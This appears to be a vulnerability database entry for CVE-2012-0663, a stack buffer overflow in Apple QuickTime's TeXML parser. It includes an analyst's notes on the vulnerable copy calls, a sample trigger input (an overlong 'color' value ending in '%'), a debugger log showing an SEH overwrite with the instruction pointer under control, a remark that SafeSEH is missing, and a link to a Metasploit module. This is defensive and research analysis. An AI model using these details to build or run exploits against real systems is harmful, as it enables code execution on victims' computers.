Unknown
CVE-2012-0663 Apple Quicktime Buffer Overflow
Unknown
(1 user assessed)
Unknown
(1 user assessed)Unknown
Unknown
Unknown
CVE-2012-0663 Apple Quicktime Buffer Overflow
Description
Multiple stack-based buffer overflows in Apple QuickTime before 7.7.2 on Windows allow remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted TeXML file.
Add Assessment
Technical Analysis
-
Down p sub_67EED2E0+193 call dangerous_copy_sub_67EED1E0 <— Interesting (0x67EED473)
Down p sub_67EED2E0+1E7 call dangerous_copy_sub_67EED1E0
Down p sub_67EED2E0+23C call dangerous_copy_sub_67EED1E0
Down p sub_67EED2E0+28D call dangerous_copy_sub_67EED1E0
Down p manage_transform_sub_67EED810+B6 call dangerous_copy_sub_67EED1E0 (*) this is the one we have reviewed
We noticed that sub_67EED2E0+193 can also trigger the crash, with even longer data without triggering the warning. In this particular case, the parser is handling arguments ending with a "%", which can be reached as a 'color' argument, for example:
{ color: AAAAAAAAAAAAAA% }
Where "AAAAAAAAAAAAAA" will be copied on the stack. Also see poc3.xml for example. As a result, we get to overwrite the stack with more data (like I said), and we end up overwriting the SEH:
(c54.da8): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\QuickTime\QTSystem\QuickTime3GPP.qtx -
eax=00000030 ebx=0013cc25 ecx=0e0a7288 edx=0000355f esi=00140000 edi=0013cba0
eip=67eed1f3 esp=0013cb74 ebp=00000004 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
QuickTime3GPP!EatTx3gComponentDispatch+0x4033:
67eed1f3 8806 mov byte ptr [esi],al ds:0023:00140000=41
0:000> !exchain
0013ce24: 30303030
Invalid exception stack at 30303030
0:000> g
(c54.da8): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=30303030 edx=7c9032bc esi=00000000 edi=00000000
eip=30303030 esp=0013c7a4 ebp=0013c7c4 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
30303030 ?? ???
”`
quicktime.qts does not have Safe SEH protected.
The final version of the exploit can be found here:
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/apple_quicktime_texml.rb
CVSS V3 Severity and Metrics
General Information
Vendors
Products
- quicktime,
- quicktime 3.0,
- quicktime 4.1.2,
- quicktime 5.0,
- quicktime 5.0.1,
- quicktime 5.0.2,
- quicktime 6.0,
- quicktime 6.0.0,
- quicktime 6.0.1,
- quicktime 6.0.2,
- quicktime 6.1,
- quicktime 6.1.0,
- quicktime 6.1.1,
- quicktime 6.2.0,
- quicktime 6.3.0,
- quicktime 6.4.0,
- quicktime 6.5,
- quicktime 6.5.0,
- quicktime 6.5.1,
- quicktime 6.5.2,
- quicktime 7.0,
- quicktime 7.0.0,
- quicktime 7.0.1,
- quicktime 7.0.2,
- quicktime 7.0.3,
- quicktime 7.0.4,
- quicktime 7.1,
- quicktime 7.1.0,
- quicktime 7.1.1,
- quicktime 7.1.2,
- quicktime 7.1.3,
- quicktime 7.1.4,
- quicktime 7.1.5,
- quicktime 7.1.6,
- quicktime 7.2,
- quicktime 7.2.0,
- quicktime 7.2.1,
- quicktime 7.3,
- quicktime 7.3.0,
- quicktime 7.3.1,
- quicktime 7.3.1.70,
- quicktime 7.4,
- quicktime 7.4.0,
- quicktime 7.4.1,
- quicktime 7.4.5,
- quicktime 7.5.0,
- quicktime 7.5.5,
- quicktime 7.6.0,
- quicktime 7.6.1,
- quicktime 7.6.2,
- quicktime 7.6.5,
- quicktime 7.6.6,
- quicktime 7.6.7,
- quicktime 7.6.8,
- quicktime 7.6.9,
- quicktime 7.60.92.0,
- quicktime 7.62.14.0,
- quicktime 7.64.17.73,
- quicktime 7.65.17.80,
- quicktime 7.66.71.0,
- quicktime 7.67.75.0,
- quicktime 7.68.75.0,
- quicktime 7.69.80.9,
- quicktime 7.7.0
Metasploit Modules
References
Advisory
